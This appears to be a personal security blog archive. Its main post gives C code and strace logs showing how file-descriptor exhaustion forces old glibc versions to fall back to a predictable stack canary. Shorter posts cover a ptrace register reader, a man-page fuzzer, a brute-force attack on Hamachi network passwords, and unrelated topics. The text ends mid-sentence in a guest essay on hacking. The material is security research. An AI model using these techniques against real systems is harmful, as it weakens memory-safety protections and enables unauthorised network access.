The example described bellow aims in disabling a Linux security countermeasure and possibly of other OSs which implement the same type of protection in a similar way. Note that below I am demonstrating this issue in older kernel/libc versions due to changes in the way that this protection is implemented in newer versions which protects against this.

Environment:
manos@jaunty:~/p/ke$ uname -a
Linux jaunty 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux

manos@jaunty:~/p/ke$ sudo aptitude show libc6
Package: libc6
State: installed
Automatically installed: no
Version: 2.9-4ubuntu6.3
Priority: required
Section: libs
Maintainer: Ubuntu Core developers
Uncompressed Size: 11.2M
Depends: libgcc1, findutils (>= 4.4.0-2ubuntu2)
Suggests: locales, glibc-doc, libc6-i686
Conflicts: libterm-readline-gnu-perl (< 1.15-2), tzdata (< 2007k-1),
tzdata-etch, nscd (< 2.9)
Replaces: belocs-locales-bin
Provides: glibc-2.9-1
Description: GNU C Library: Shared libraries
Contains the standard libraries that are used by nearly all programs on the
system. This package includes shared versions of the standard C library and the
standard math library, as well as many others.
*This glibc version was purposely picked.

manos@jaunty:~/p/ke$ gcc -v
..
gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4)

First lets print out the posted poc code:

#include <sys/socket.h>
#include <sys/un.h>

static int send_fd (int unix_fd, int fd)
{
struct msghdr msgh;
struct cmsghdr *cmsg;
char buf[CMSG_SPACE (sizeof (fd))];
memset (&msgh, 0, sizeof (msgh));

memset (buf, 0, sizeof (buf));

msgh.msg_control = buf;
msgh.msg_controllen = sizeof (buf);

cmsg = CMSG_FIRSTHDR (&msgh);
cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
cmsg->cmsg_level = SOL_SOCKET;

cmsg->cmsg_type = SCM_RIGHTS;

msgh.msg_controllen = cmsg->cmsg_len;

memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
return sendmsg (unix_fd, &msgh, 0);
}

int main ()
{

int fd[2], ff[2];

int target;
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
return 1;
for (;;)
{
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
return 2;
send_fd (ff[0], fd[0]);
send_fd (ff[0], fd[1]);

close (fd[1]);
close (fd[0]);
fd[0] = ff[0];
fd[1] = ff[1];
}
}

Check here and here if you want to know what is happening.

Next, we are moving to the targeted protection:

file: glibc-2.9/sysdeps/unix/sysv/linux/dl-osinfo.h

..
static inline uintptr_t __attribute__ ((always_inline))
_dl_setup_stack_chk_guard (void)
{
  uintptr_t ret;
#ifdef ENABLE_STACKGUARD_RANDOMIZE
  int fd = __open ("/dev/urandom", O_RDONLY);
  if (fd >= 0)
    {
      ssize_t reslen = __read (fd, &ret, sizeof (ret));
      __close (fd);
      if (reslen == (ssize_t) sizeof (ret))
	return ret;
    }
#endif
  ret = 0;
  unsigned char *p = (unsigned char *) &ret;
  p[sizeof (ret) - 1] = 255;
  p[sizeof (ret) - 2] = '\n';
  return ret;
}
..

It is pretty obvious what our target is. Just in case you didn’t see it, we want to use our file exhaustion bug and disable the ENABLE_STACKGUARD_RANDOMIZE part of the code and leave only the terminator value (aka ff0a0000) which in certain situations can be overwritten and secure us EIP control.

we want this unreachable :

  if (fd >= 0)
    {
      ssize_t reslen = __read (fd, &ret, sizeof (ret));
      __close (fd);
      if (reslen == (ssize_t) sizeof (ret))
	return ret;
    }

We want fd to return something less than 0. To increase our chances of doing this we are going to modify a little bit our FD exhaustion code :

#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>   

//return file-nr array - exit's when there are not enough File Descriptors
int* nr()
{
	char line [100];
	FILE *filenr;
	if((filenr = fopen("/proc/sys/fs/file-nr", "r")) == NULL){printf("\nOvershoot FDs - exiting\n");exit(0);}
	fgets ( line, sizeof line, filenr );
	fclose(filenr);
	int out[3];
	sscanf(line, "%d %d %d", &out[0],&out[1],&out[2]);
return out;
}   

static int send_fd (int unix_fd, int fd)
{
	  struct msghdr msgh;
	  struct cmsghdr *cmsg;
	  char buf[CMSG_SPACE (sizeof (fd))];
	  memset (&msgh, 0, sizeof (msgh));
	  memset (buf, 0, sizeof (buf));
	  msgh.msg_control = buf;
	  msgh.msg_controllen = sizeof (buf);
	  cmsg = CMSG_FIRSTHDR (&msgh);
	  cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
	  cmsg->cmsg_level = SOL_SOCKET;
	  cmsg->cmsg_type = SCM_RIGHTS;
	  msgh.msg_controllen = cmsg->cmsg_len;
	  memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
	  return sendmsg (unix_fd, &msgh, 0);
}    

int crash_loop(int loop)
{

 int fd[3], ff[3];
 int count=0;

  while (count<loop)
  {  

	//Set FD lower limit for shooting out Canary
	int *in = nr();
	int c=in[0],i=in[1],l=in[2]; 

		if (l-c<=80)
		{
		system("strace -x -e trace=read,open ./m");
		}              

    if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
    return 2;
    send_fd (ff[0], fd[0]);
    send_fd (ff[0], fd[1]);
    close (fd[1]);
    close (fd[0]);
    fd[0] = ff[0];
    fd[1] = ff[1];
	count++;
  }
}

int main (int argc, char *argv[])
{
	printf ("Start Exhaustion Loop\n");  

    while (1)
		{
	    	crash_loop(1);
        	}
} 

What we added is some control over the loop and nr() which probes /proc/sys/fs/file-nr and gets the current used FDs and the system’s FD limit. Then we take this array and we set the lower limit of free file descriptors before attempting to “lock” access to /dev/urandom. Note that since this process is going to be un-killable we want it to stop at the point where we have no other free descriptors, hence we “exit” when we can’t open /proc/sys/fs/file-nr. We execute our victim application using strace, as we want to see all the system calls (e.g. open, read). *Note that the use of usleep might come handy if we want to stabilise our free FDs to a certain number, since the method described below is likely to be used in a waiting stabilising process form rather than executing multiple times our target program as described here.

Now let’s look our victim application :

#include <stdint.h>
#include <stdio.h>

int main(int argc, char *argv[]) 

  	{   //STACK_CHK_GUARD  -  i386    (stackguard-macros.h)
		uintptr_t x;
		asm ("movl %%gs:0x14, %0" : "=r" (x));
		fprintf(stderr, "Cookie [%%gs:0x14=%0lx]\n\n",x)    ;
	}

We simply take the canary from %gs:0×14 and we print it out. If we execute it with strace we get the following :

brk(0) = 0x8b3e000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb8000000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=50808, ...}) = 0
mmap2(NULL, 50808, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ff3000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\.."..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e90000
mprotect(0xb7fec000, 4096, PROT_NONE) = 0
mmap2(0xb7fed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fed000
mmap2(0xb7ff0000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ff0000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e8f000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e8f6c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
open("/dev/urandom", O_RDONLY) = 3
read(3, "\xc9\x6e\xa8"..., 3) = 3
close(3) = 0
mprotect(0xb7fed000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb801f000, 4096, PROT_READ) = 0
munmap(0xb7ff3000, 50808) = 0
write(2, "Cookie [%gs:0x14=a86ec900]\n\n"..., 28Cookie [%gs:0x14=a86ec900]) = 28
exit_group(28) = ?

We can clearly see that :

open("/dev/urandom", O_RDONLY) = 3
read(3, "\xc9\x6e\xa8"..., 3) = 3

and our canary is a86ec900 (little endian + 1 null byte)

Now that we have everything set let’s see what happens when we execute our code:

manos@jaunty:~/p/ke$./pp&
Start Exhaustion Loop
.
.
.
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00....., 512) = 512
open("/dev/urandom", O_RDONLY) = 3
read(3, "\x04\xe8\x8e"..., 3) = 3
Cookie [%gs:0x14=8ee80400]
open("/etc/ld.so.cache", O_RDONLY) = 0
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x0.."..., 512) = 512
open("/dev/urandom", O_RDONLY) = 0
read(0, "ATX"..., 3) = 3
Cookie [%gs:0x14=58544100]
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03.."..., 512) = 512
open("/dev/urandom", O_RDONLY) = -1 ENFILE (Too many open files in system)
Cookie [%gs:0x14=a967000]
Overshoot FDs - exiting

As we can see, after some executions we managed to block ENABLE_STACKGUARD_RANDOMIZE with an ENFILE error and jump straight after the if statement. Clearly we should have seen ff0a0000 here. After some more tries we observe the following canary values (for fd =-1) :

..
0xe8537000
0x1c0d7000
0x146c7000
0xe8b0f000
0x1d487000
0x13d2f000
0x15caf000
0x7c3f000
0xe1b47000
0x6e77000
0xe5a47000
0x1ab7f000
0xf4237000
0x1978f000
0xe584f000
0x5287000
0x18de7000
0xb517000
0x1311f000
0xf1f47000
0x310f000
0xfe0b7000
0xf7ccf000
0xff2ff000
0xf8d07000
0x6e77000
0xf35ef000
0xf0f07000
0xe21af000
0xf1b57000
0xb71f000
0x1c0d7000
0xe9f5f000
0xe832f000
0xe8f1f000
0xed26f000
0xee4b7000
0x83cf000
0xeb1e7000
0xc0c7000
0xf9f4f000
..

Some modification is happening on the terminator canary.

If we get libc6 along with glibc_2.9-4ubuntu6.3.diff and inspect the patch, we see the following lines added within dl-osinfo.h :

+@@ -77,5 +80,31 @@
+   unsigned char *p = (unsigned char *) &ret;
+   p[sizeof (ret) - 1] = 255;
+   p[sizeof (ret) - 2] = '\n';
++#ifdef HP_TIMING_NOW
++  hp_timing_t hpt;
++  HP_TIMING_NOW (hpt);
++  hpt = (hpt & 0xffff) << 8;
++  ret ^= hpt;
++#endif
++  uintptr_t stk;
++  /* Avoid GCC being too smart.  */
++  asm ("" : "=r" (stk) : "r" (p));
++  stk &= 0x7ffff0;
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++  stk <<= (__WORDSIZE - 23);
++#elif __WORDSIZE == 64
++  stk <<= 31;
++#endif
++  ret ^= stk;
++  /* Avoid GCC being too smart.  */
++  p = (unsigned char *) &errno;
++  asm ("" : "=r" (stk) : "r" (p));
++  stk &= 0x7fff00;
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++  stk <<= (__WORDSIZE - 29);
++#else
++  stk >>= 8;
++#endif
++  ret ^= stk;
+   return ret; ;

This patch is XORing the value of ret (terminator value) with the current CPU tick counter (taken from rdtsc). Then the array’s (p) address is used (as additional entropy) and the rest can be replicated by us, so the patch adds some fair and cheap trickery (poor man’s randomisation) – *while I was writing this post, this was published, which shows that windows kernel mode canary generation is similar to the above.

To make sure that a glibc version without the stack-guard-quick-randomization.diff applied is giving ff0a0000 (even though we can confirm this with strace), we recompile glibc without this patch. This will save us some time of looking around to find a distro without this patch applied (we just comment out all XOR operations).

So lets run pp again :
manos@jaunty:~/p/ke$./pp&
Start Exhaustion Loop
.
.
.
[b80a70d4] open("/etc/ld.so.cache", O_RDONLY) = 0
[b80a70d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
[b80a7154] read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00.."..., 512) = 512
[b80a70d4] open("/dev/urandom", O_RDONLY) = 0
[b80a7154] read(0, "\x17\x7f\x77"..., 3) = 3
Cookie [%gs:0x14=777f1700]
[b7f7e0d4] open("/etc/ld.so.cache", O_RDONLY) = 3
[b7f7e0d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
[b7f7e154] read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\..."..., 512) = 512
[b7f7e0d4] open("/dev/urandom", O_RDONLY) = 3
[b7f7e154] read(3, "\x70\xec\x1e"..., 3) = 3
Cookie [%gs:0x14=1eec7000]
[b80f10d4] open("/etc/ld.so.cache", O_RDONLY) = 0
[b80f10d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
[b80f1154] read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00..."..., 512) = 512
[b80f10d4] open("/dev/urandom", O_RDONLY) = 0
[b80f1154] read(0, "\x64\x95\xb7"..., 3) = 3
Cookie [%gs:0x14=b7956400]
[b808a0d4] open("/etc/ld.so.cache", O_RDONLY) = 3
[b808a0d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
[b808a154] read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00..."..., 512) = 512
[b808a0d4] open("/dev/urandom", O_RDONLY) = -1 ENFILE (Too many open files in system)
Cookie [%gs:0x14=ff0a0000]
Overshoot FDs - exiting

We are now certain that a simple File Descriptor exhaustion bug can assist in disabling canary stack randomisation. It is worth mentioning that /dev/urandom was dropped mainly on performance and not security implications of FD hijacking or shortage.

As this post is focused on disabling the ENABLE_STACKGUARD_RANDOMIZE we are not going to analyse ways of guessing/determing stack-guard-quick-randomization.diff entropy points, however going back to the patched version and based solely on visual canary value observations, we can see that we significantly reduced the canary space from 16777215 to almost 65535. rdtsc can be predicted with some decent accuracy in a low/medium usage uniprocessor systems, during non-context switched execution, but we save this for another time.

Below is a simple patch for strace – which prints rdtsc at each “syscal exit” (trace_syscall_exiting) – It is not accurate but it can be used for roughly observing tick jumps

--- syscall.c
+++ syscall.c
@@ -109,7 +109,7 @@
 #define TN TRACE_NETWORK
 #define TP TRACE_PROCESS
 #define TS TRACE_SIGNAL
-
+#define HP_TIMING_NOW(Var)	__asm__ __volatile__ ("rdtsc" : "=A" (Var))
 static const struct sysent sysent0[] = {
 #include "syscallent.h"
 };
@@ -2520,7 +2520,8 @@
 			(long) tv.tv_sec, (long) tv.tv_usec);
 	}
 	printtrailer();
-
+	HP_TIMING_NOW (hpt);
+	tprintf(" rdtsc : %lld   ",hpt );
 	dumpio(tcp);
 	if (fflush(tcp->outf) == EOF)
 		return -1;

The output of strace with the rdtsc out is :
execve("./m", ["./m"], [/* 20 vars */]) = 0
rdtsc : 170812617327520 brk(0) = 0x9a62000
rdtsc : 170812617944640 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812618580380 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb8083000
rdtsc : 170812618926180 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812619351780 open("/etc/ld.so.cache", O_RDONLY) = 3
rdtsc : 170812619758760 fstat64(3, {st_mode=S_IFREG|0644, st_size=50808, ...}) = 0
rdtsc : 170812620131160 mmap2(NULL, 50808, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb8076000
rdtsc : 170812620421100 close(3) = 0
rdtsc : 170812620785520 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812621126000 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
rdtsc : 170812621530320 read(3, "\177ELF\1\1\1\3\3\1\320h\1004"..., 512) = 512
rdtsc : 170812621830900 fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
rdtsc : 170812622221920 mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7f13000
rdtsc : 170812622559740 mprotect(0xb806f000, 4096, PROT_NONE) = 0
rdtsc : 170812622852340 mmap2(0xb8070000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb8070000
rdtsc : 170812623144940 mmap2(0xb8073000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb8073000
rdtsc : 170812623490740 close(3) = 0
rdtsc : 170812623831220 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f12000
rdtsc : 170812624230220 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7f126c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
rdtsc : 170812624568040 open("/dev/urandom", O_RDONLY) = 3
rdtsc : 170812624900540 read(3, "\247\33'", 3) = 3
rdtsc : 170812625185160 close(3) = 0
rdtsc : 170812625453820 mprotect(0xb8070000, 8192, PROT_READ) = 0
rdtsc : 170812626110840 mprotect(0x8049000, 4096, PROT_READ) = 0
rdtsc : 170812626430040 mprotect(0xb80a2000, 4096, PROT_READ) = 0
rdtsc : 170812626757220 munmap(0xb8076000, 50808) = 0
rdtsc : 170812627081740 write(2, "\nUSAGE: 1 (print Canary), 2 (ter"..., 52
USAGE: 1 (print Canary), 2 (terminator owerwrite)) = 52
rdtsc : 170812627674920 exit_group(52) = ?


For other possible FD exhaustion targets you can look here.

I didn’t explain some things since they have been discussed before, so if you have unanswered questions have a look below :

First I had to write the C part of it, for the instrumentation. A simple way to get the registers is to use ptrace. First we attach to a process, then we get the register, then we detach and finally return the value.

For this to work as a ruby module we have to use the ruby.h

#include "ruby.h"
#include <unistd.h>
#include <linux/ptrace.h>
#include <sys/user.h> 

VALUE RegInfo = Qnil;
void Init_reginfo();

VALUE method_getr(VALUE self,VALUE arg,VALUE pid);

void Init_reginfo()
{
        RegInfo = rb_define_module("RegInfo");
        rb_define_method(RegInfo, "getr", method_getr,2 );
}

VALUE method_getr(VALUE self, VALUE arg, VALUE pid)
{
	char* input=RSTRING_PTR(arg);
	pid_t  process = NUM2INT(pid);
	struct user_regs_struct registers;
	long out=0;
	char outreg[10];
	ptrace(PTRACE_ATTACH,process,0,0); //attach to process
	waitpid(process,NULL,0);
	ptrace(PTRACE_GETREGS,process,&registers,&registers); //get'em
	if (!strncasecmp(input,"eax",3)){out = registers.eax;}  //make sure we don't cmpr case
	else if (!strncasecmp(input,"edx",3)){out = registers.edx;}
	else if (!strncasecmp(input,"ebx",3)){out = registers.ebx;}
	else if (!strncasecmp(input,"ecx",3)){out = registers.ecx;}
	else if (!strncasecmp(input,"ebp",3)){out = registers.ebp;}
	else if (!strncasecmp(input,"esi",3)){out = registers.esi;}
	else if (!strncasecmp(input,"eip",3)){out = registers.eip;}
	else {out =  registers.eip;} //default
	ptrace(PTRACE_DETACH,process,0,0); //detach from process
	snprintf(outreg,10,"%lx",out);
	return rb_str_new2(outreg);
}

</pre>
</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">

Next it’s straight forward, we create an extconf.rb file which when we execute generates the Makefile which will compile our module.

require 'mkmf'
extension_name = 'reginfo'
dir_config(extension_name)
create_makefile(extension_name)

And an example

require 'reginfo'
include  RegInfo

pid = fork do
system("tail -f txt")
end

puts getr("eip",pid) #here we get EIP

The above  prints something like b7f577d8

You can download reginfo from here, the source code from here and project updates here.

This is a very simple linux module at the moment that performs only this specific task, more functionality will be added soon. If you are looking for something a bit more elaborate, have a look at METASM.

A couple of months ago Pascal Cretain invited me to participate in a very interesting project. A bunch of security people and a bunch of noise artists were going to collaborate, the mission was : The Noisicians will have “Subversive Computing” as their central theme, and the Subversive Technologists will work with “Noise”.

Noise vs. Subversive Computing

This may not sound very complex, but it is! Despite what we use noise for and what our perception of noise is, it is not easy to generate, compose and generally conceive it in a controlled and meaningful way. Cacophony or atonality can very quickly displease, due to the surprise element which is usually generated by abnormal db fluctuations.

Having all these in mind, I start thinking of a way to create a natural sound (around noise) which will assist in creating a visually familiar image, without surprising the listener too much.

The idea that popped into my mind was to generate an audible version of a Rainbow. To do that I chose to use what it is known as the “Colors of Noise“, which refers to the power distribution in frequency spectrum of different types of noise.

If you think that it is easy to create different types of noise, then I have to assume that you haven’t tried. For my experiments I used the tools included in the CCRMA, and more specifically CLM (Common Lisp Music) and SND (Sound editor).

I also used several of the example scripts that come with these packages and in cases that I couldn’t create a specific “colour”, I used a bit of artistic license and normal mixing (subtractive and additive) e.g. yellow + red = orange.

Example script to generate Green Noise (bounded brownian noise) :
(definstrument (green3 start dur freq amp amp-env noise-freq noise-width noise-max-step)
(let* ((grn (make-green-noise-interp :frequency noise-freq
:amplitude noise-max-step
:high (* 0.5 noise-width) :low (* -0.5 noise-width)))
(osc (make-oscil freq))
(e (make-env amp-env :scaler amp :duration dur))
(beg (seconds->samples start))
(end (+ beg (seconds->samples dur))))
(run
(lambda ()
(do ((i beg (+ 1 i)))
((= i end))
(outa i (* (env e)
(+ 1.0 (green-noise-interp grn))
(oscil osc))))))))

(with-sound ()
(green3 0 2.0 440 .5 '(0 0 1 1 2 1 3 0) 100 .2 .02))


Finally, all colours mix with the prior colour/s right after they introduce themselves.
Something like : Colours[0], Colours[1], Colours[0]+Colours[1], Colours[2], .........

On the foreground , there is a minimalistic piano composition which tries to not distract too much from the background colours and helps in assisting the after rain “Rainbow” effect.

Noise vs. Subversive Computing

For more information about the project, the participants and their very interesting ideas,
visit : http://www.myspace.com/pascalcretain

The compilation has been released with
Computationally Infeasible Records

Looking at the latest JCrypTool version, it is apparent that there are vast design improvements, it is also more modular, which makes the extensibility of the project a very easy task. There are several algorithms to use, symmetric, assymetric, hash, MAC etc. So there are lots of things to play with!

Diffie-Hellman /AES

In the Cryptanalysis part of the tool, there is a Columnar Transposition module, Frequency analysis graphs, aFriedman Test function and a Vigenere analyser/helper, so there is space for additions. Speaking of additions, I particularly like the plugins architecture in use, which makes the project very interesting indeed.

Frequency Analysis / Shark

In the past, I developed a simple cryptanalysis tool which I am now intending to move into JCrypTool in the form of a plugin and possibly doing the same for a very old project.

I recommend you go and have a look at it.

This article is kept just for reference. I will try to package the source code and give it as a download at some point.

Anyway, to cut a long story short, utilising jQuery, Google Code Search API and Bugle, I created an automated version of the Bugle project which looks as close as possible to a desktop based source code review tool.

To demonstrate Bugle Automated I will be looking for bugs in Samba. The first step is to add the package you want to inspect in the Scan field, as you can see below there is Auto Complete functionality available suggesting possible packages while you type a name.

After choosing a package, press scan an Bugle will do the rest.

The first screen you see is a bit empty , both the Main Panel and the Stats Panel will load as soon as you choose a vulnerability category from the left side. Bugle displays the number of issues of each category, so you can immediately get an general idea on where you might find a bug.

As soon as you choose a category a sub menu will be revealed, presenting all the different signatures in that category. At the same time the statistics Panel will load and all the relevant graphs for the project/categories and categories/signatures will be displayed.

Next we choose the Buffer Overflows category, with 205 hits and then the Generic BoF signature (with 50 hits). The Main Panel loads and then we can see each individual line with a possible bug. We scroll down until we find something that could be a vulnerability and click on that line.

We click the Line 117 of samba-1.9.15p8.mvs/source/sockspy.c and we inspect the code in the Code Snippet dialog. Then we scroll down until we find the line with the yellow highlighted text

We can see that strcpy(DestHost,argv[1]); is copying the arv[1] into the DestHost buffer which has 256 chars size. Now we can guess that if we pass in the command line DestHost larger than 256 chars we can create a buffer overflow condition. (Note that this bug in sockspy.c is in a very very very old version of Samba)

That’s Bugle Auto Scanner, hopefully this will assist in discovering and fixing bugs out there.

In this paper, we introduce a mode of operation that can be applied to any existing or future hash function in order to improve its collision resistance. In particular, we use steganography, the art of hiding a message into another message, to create a scheme, named Σ-Hash, which enforces the security of hashing algorithms. We will demonstrate how, apart from hash function security, Σ-Hash can also be used for securing Open Source code from tampering attacks and other applications.

Conference: SECRYPT – International Conference on Security and Cryptography, Spain 2007
Authors: Emmanouel Kellinis and Konstantinos Papapanagiotou

If you need more information about this paper, get in touch.

The format which man pages follow is universal (mostly), so it is not very difficult to make a script and extract the offered options – which is exactly what gave me the idea of making a tool that can generate fuzzing data based on manual pages. Based on that concept we can fuzz as accurately as possible any command that has a man page.

So lets take a command and generate fuzzing data.

The choice for this example is “shar” - GNU sharutils 4.2.1

Shar creates “shell archives” (or shar files) which are in text format and can be mailed. These files may be unpacked later by executing them with /bin/sh. The resulting archive is sent to standard out unless the -o option is given.

Below you can see how a man page looks in the console

or have a look at the On-line Shar Manual pageThere are several options available for this command and therefore the fuzzer has to generate lots of combinations. Fuzzman catches signals so if you see that you have enough combinaitons you can press ctrl-c.
if you type ./fuzzman.pl shar you get :

=== Extract arguments for "shar" ===
STANDARD
: --version
: --print-text-domain-dir
: --help
: --version
: -q
: -p
: -Z
: -S
: -z
: -o
: -l
: -L
: -n
.
.
.
: --no-i18n
: --print-text-domain-dir
ADDITIONAL
: EXTRA BoF Arg
: EXTRA Format String Arg
: EXTRA Numbers Arg

:Number of Arguments :36 <=== it is not 100% accurate but is very close

=== Generate Fuzzing Script ===
+STOP GENERATOR WITH CTRL-C
:Agrument combinations : 1040 <== This is the combinations counter
:Partial shar.sh, not all combinations have been generated
:Run fuzzing script [sh shar.sh]

We can see above that there are approximately 36 options. That would create several thousand combinations so I stopped it at 1040 combinations. Fuzzman tried different options adding arguments that could potentially lead to different overflow types, now the shar.sh script is ready.

Starting the shar.sh will execute the command 1040 times.

As we can see above we hit into a bug, Segmentation fault is always a sign.

You can download Fuzzman from here,
Enjoy

Note: This version of Sharutils have been reported for both Buffer Overflow and Format string vulns some time ago (here and here)

Detect Networks script Detect-hamachi.pl

After that the next step was to see if the system returns a distinctive error if the network picked is correct but the password supplied is wrong. Again that proved to be the case, so the next step was to check on the network I created if there is any account lockout or IP blocking if I submit the wrong password several times. I send the wrong password 10 times and the account was still active. When considering the fact that someone creates a VPN to establish a secure tunnel between private assets this can be considered as an immediate security threat.

At this stage I modified the previous tiny script to go through a list of passwords given a valid network name and the result was predictebale, found the valid password and join the network.

Find valid Hamachi passwords script beef-hamachi.pl

A fast solution to the issue described is to “Block new network members by default”, there is an option in the Security tab to do that.

All of the above are very simple observations, nothing on the protocol or implementation as such (also as far as I am concerned the project is closed source at the moment). Haven’t used it that much so if you see something wrong in here let me know.

These scripts work only in linux and you need to have perl and hamachi installed. Have a look at http://files.hamachi.cc/linux/README on how to install in linux , note in Debian you need to create the /dev/net/tun device to make it work.

mkdir /dev/net/tun
mknod /dev/net/tun c 10 200

Note: The provided scripts are only for illustration purpose, use them only on networks you own.

Guest Post by (Pascal.Cretain[AT]gmail.com)

An awful lot has been said about hacking, most of it is simply not true. Due to misinformation, ignorance, the decline of mass media, and other miscellaneous obscure powers, hacking has been associated with electronic crime, illegal access to forbidden realms, the pentagon, the FBI, the CIA, the Russian mafia, credit card fraud, identity theft, software piracy, vandalism, corruption, murder and death. Give me a break. A hacker, in the original sense, is a person who is curious, inventive, intelligent, eager to learn, willing to discover (and perhaps fail a thousand times before achieving any result) alternative ways of using tools and ideas. Using a metaphor here, if I may, a hacker is a bit like a child; she likes to take things apart to see what’s inside, and find out how things actually work. A hacker likes to stretch things to their limits, use devices in ways they were not meant to be used, cross borders and break rules just for the sake of experimentation. A real hacker does not give a fuck about the potential trophy (be it a p0rn, software, monetary compensation, sensitive databases or anything else) waiting for her as soon she has gained access to a restricted domain using a creative, alternative route to circumvent the defence mechanisms in place. She might e-mail the system administrators to let them know that their security is crap, at best, leave everything impact, then move on to a new project. A hacker is more than anything else, a student, not a criminal mind, period. This definition is not necessarily restricted in the world of computing. One can hack in real life. If you decide that your TV does not have any positive effect on your life when it’s on, and decide to cover it with a table cloth, and use it to eat your breakfast on, then you have hacked your TV, in a primitive fashion. Well done, that’s a great starting point.

There is a reason why all this bad hype around hacking has been created. See, hacking is tightly bound with intelligence, creativity and free spirit. Now these attributes are a bit of a threat to governments, global regulators and other bodies ‘in charge’ who want to run the show. To achieve their goal easily and effectively, the controlling powers need to have obedient, non-creative and certainly not very intelligent citizens under their supervision. Where this profit-making, control seeking ‘plan’ is supposed to lead humanity is beyond me, still there is a good chance that this is the way things work nowadays. It is not a coincidence that formal education has degraded to simple (biased) information processing. Our schools, institutions, society and family do not encourage creative and alternative thinking. In fact, they are afraid of it. This concept can extend even more, taking into consideration our lives and career aspirations in general. As the freegan manifesto (http://freegan.info/?page=anotherview) accurately proclaims, as much as capitalists like equating the free market with freedom, our lives are severely constrained under capitalism. Here in we are all expected to live within the rules of a specific narrow model. We go to schools that promote hierarchy and obedience while suppressing creativity and indoctrinating us with the patriotic dogmas and distorted histories of the dominant forces of our national leadership. We are compelled to fiercely compete for the best grades so that we can get into the best college, run up big debts on college loans that we will spend years paying off. Get good grades, get into the best grad school, get a high paying job, buy lots of stuff, buy a house and spend years paying off the mortgage, have kids, keep working to the point where out jobs become miserable unending chores, put our kids through 